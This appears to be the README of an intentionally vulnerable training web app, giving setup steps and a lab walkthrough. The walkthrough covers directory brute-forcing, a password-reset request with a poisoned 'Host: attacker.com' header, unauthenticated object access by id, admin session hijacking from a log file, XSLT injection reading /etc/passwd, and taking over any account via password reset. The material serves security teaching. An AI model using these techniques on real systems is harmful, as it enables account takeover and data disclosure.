This app is intentionally vulnerable!
- Simply run
docker-compose up
and visithttp://localhost:80
- Install the Python dependencies:
pipenv shell
pipenv install
- Run the Python API via
python3 app.py
- Run Nginx via
docker run --name my-nginx -p 80:80 -v ./nginx.conf:/etc/nginx/nginx.conf:ro -d nginx
- We run
gobuster dir -u http://localhost -w ./resources/wordlist.txt
- Looking at the output, we find
/pirates
exposed - We visit
http://localhost/pirates
and findhttp://localhost/pirates/treasure.txt
- Send a
POST
request like:
POST /reset-password HTTP/1.1
Host: attacker.com
Content-Length: 25
{"email":"[email protected]"}
- Check out the 'Loot' functionality and realize that you can access, without authentication, any loot if you know the
id
- Check out the
production.log
again and find theid
of theadmin
user
- This is of course only like god-level bad if we can take over an admin account... So that's what we're gonna do here
- First, we find the admin's
sessionId
in theproduction.log
and then run commands
- Use the
Transform XML with XSLT
functionality - Upload a file and take the
./resources/injection-read-file.xslt
, and observe that the/etc/passwd
file was returned
- Realize that you can change another user's password if you provide their email address
- This means you can change any users' password